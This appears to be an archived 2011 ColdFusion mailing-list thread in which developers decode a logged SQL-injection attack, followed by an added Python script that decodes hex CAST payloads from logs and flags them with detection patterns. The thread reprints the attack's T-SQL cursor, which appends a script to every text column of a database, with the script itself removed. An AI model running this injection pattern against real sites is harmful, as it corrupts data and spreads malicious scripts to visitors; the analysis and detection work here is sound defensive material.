Yep.... a bit cleaner than the last attack like this I saw.

-----Original Message-----
From: Russ Michaels [mailto:r...@michaels.me.uk]
Sent: Friday, May 13, 2011 10:31 AM
To: cf-talk
Subject: Re: Can anyone decode this?

it is some very clever SQL though

On Fri, May 13, 2011 at 3:57 PM, Mark A. Kruger <mkru...@cfwebtools.com> wrote:

> This tries to append a malicious script to all the character columns in your
> DB in the hopes that you will select them and output them to a page (thus
> propagating the link).
>
> The script is a <script> block that redirects to a malicious site. Here's
> the basic outline with the script removed.
>
> DECLARE @T varchar(255),
> @C varchar(4000)
> DECLARE Table_Cursor CURSOR FOR select a.name,b.name
> from sysobjects a,syscolumns b
> where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
> b.xtype=231 or b.xtype=167)
>
> OPEN Table_Cursor
> FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
>
> BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''*****malicious script******'' where '+@C+' not like ''%*****malicious script***''')
>
> FETCH NEXT FROM Table_Cursor INTO @T,@C END
>
> CLOSE Table_Cursor DEALLOCATE Table_Cursor
>
> Mark A. Kruger, MCSE, CFG
> (402) 408-3733 ext 105
> www.cfwebtools.com
> www.coldfusionmuse.com
> www.necfug.com
>
> -----Original Message-----
> From: Jeff Garza [mailto:j...@garzasixpack.com]
> Sent: Friday, May 13, 2011 9:39 AM
> To: cf-talk
> Subject: RE: Can anyone decode this?
>
> Put this in your SQL Query analyzer tool and change the EXEC at the end to
> PRINT. It should print out the SQL Statement for you to see what they were
> trying to do.
>
> Cheers,
>
> Jeff
>
> -----Original Message-----
> From: Che Vilnonis [mailto:ch...@asitv.com]
> Sent: Friday, May 13, 2011 7:31 AM
> To: cf-talk
> Subject: Can anyone decode this?
>
> Can anyone decode this? This was a URL attack that was caught by some custom
> code. I tried decoding the string at
> http://meyerweb.com/eric/tools/dencoder/ but had no luck.
>
> > 113|736;DECLARE @S CHAR(4000);SET @S=CAST(0x[hex-encoded payload omitted] AS CHAR(4000));EXEC(@S);
> >
> > Thanks, Che

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344498
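
Jeff's PRINT tip needs a SQL Server session; the same decoding can be done offline from a log line. The following is an added example, not code from the thread: it pulls the CAST(0x... AS CHAR(n)) literal out of a logged request, decodes it without executing anything, and flags the traits Mark's outline describes. The sample request, its example.invalid URL, and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS CHAR(n)), also VARCHAR/NCHAR/NVARCHAR, as in the request above
CAST_HEX = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f\s]+?)\s+AS\s+(N?(?:VAR)?CHAR)\s*\(\s*(?:\d+|MAX)\s*\)\s*\)",
    re.IGNORECASE,
)

# Traits of the decoded batch that Mark's outline points out
TRAITS = {
    "enumerates user tables": re.compile(r"\bsys(objects|columns)\b", re.I),
    "cursor loop": re.compile(r"\bCURSOR\s+FOR\b", re.I),
    "dynamic UPDATE": re.compile(r"\bexec\s*\(\s*'update\b", re.I),
    "appends <script>": re.compile(r"<script\b", re.I),
}


def decode_cast_payloads(raw_request):
    """Return the text hidden in each CAST(0x.. AS CHAR) literal; nothing is executed."""
    text = unquote_plus(raw_request)
    decoded = []
    for match in CAST_HEX.finditer(text):
        hex_digits = re.sub(r"\s+", "", match.group(1))
        if len(hex_digits) % 2:  # truncated in the log: drop the odd nibble
            hex_digits = hex_digits[:-1]
        data = bytes.fromhex(hex_digits)
        # N-prefixed types are UTF-16LE on SQL Server; CHAR/VARCHAR are single-byte
        codec = "utf-16-le" if match.group(2).upper().startswith("N") else "latin-1"
        decoded.append(data.decode(codec, errors="replace"))
    return decoded


def classify(sql_text):
    """Names of the traits present in a decoded batch."""
    return [name for name, rx in TRAITS.items() if rx.search(sql_text)]


# Constructed sample: a harmless stand-in batch, hex-encoded the same way
SAMPLE_SQL = ("DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,"
              "syscolumns b where a.id=b.id exec('update [t] set [c]=[c]+''<script "
              "src=\"http://example.invalid/x.js\"></script>''')")
SAMPLE_REQUEST = ("id=113;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
                  + SAMPLE_SQL.encode("latin-1").hex().upper()
                  + "%20AS%20CHAR(4000));EXEC(@S);")

if __name__ == "__main__":
    for sql in decode_cast_payloads(SAMPLE_REQUEST):
        print(classify(sql), sql, sep="\n")
```
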